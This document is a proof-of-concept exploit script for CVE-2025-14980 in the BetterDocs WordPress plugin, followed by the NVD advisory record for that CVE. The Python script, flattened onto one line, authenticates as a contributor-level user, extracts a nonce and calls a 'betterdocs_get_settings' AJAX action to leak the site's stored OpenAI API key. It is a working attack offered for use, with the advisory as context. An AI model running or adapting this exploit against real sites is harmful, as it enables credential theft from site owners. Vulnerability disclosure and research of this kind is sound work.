CVE-2025-14980

import requests import sys from bs4 import BeautifulSoup # CVE-2025-14980 PoC - BetterDocs Plugin Sensitive Information Exposure # Authenticated attackers with contributor-level access can extract OpenAI API keys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" USERNAME = "contributor" # Low-privilege account PASSWORD = "password" def get_nonce(sess, url): """Extract WordPress nonce for authenticated requests""" resp = sess.get(f"{url}/wp-admin/admin.php?page=betterdocs-settings") soup = BeautifulSoup(resp.text, 'html.parser') nonce_elem = soup.find('input', {'id': '_wpnonce'}) if nonce_elem: return nonce_elem.get('value') return None def exploit(): """Exploit the scripts() function to extract sensitive data""" sess = requests.Session() # Step 1: Authenticate with WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } sess.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Get nonce for the request nonce = get_nonce(sess, TARGET_URL) if not nonce: print("[-] Failed to obtain nonce") return # Step 3: Trigger scripts() function to leak settings # This exploits the unprotected endpoint in BetterDocs < 4.3.4 exploit_data = { 'action': 'betterdocs_get_settings', '_wpnonce': nonce } response = sess.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data ) # Step 4: Parse response for sensitive data if response.status_code == 200: data = response.json() if 'openai_api_key' in str(data): print("[+] OpenAI API Key leaked!") print(response.text) else: print("[-] No sensitive data in response") else: print(f"[-] Request failed with status: {response.status_code}") if __name__ == "__main__": print("[*] CVE-2025-14980 BetterDocs Sensitive Info Exposure PoC") exploit()

{"cve": {"id": "CVE-2025-14980", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:01.913", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive data including the OpenAI API key stored in plugin settings."}, {"lang": "es", "value": "El plugin BetterDocs para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 4.3.3, inclusive, a través de la función scripts(). Esto permite a atacantes autenticados, con acceso de nivel de colaborador o superior, extraer datos sensibles, incluyendo la clave API de OpenAI almacenada en la configuración del plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3430424%40betterdocs%2Ftags%2F4.3.4&old=3422660%40betterdocs%2Ftrunk", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-14980/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1595f231-d300-484a-a0e1-1e2bc7b82ed3?source=cve", "source": "[email protected]"}]}}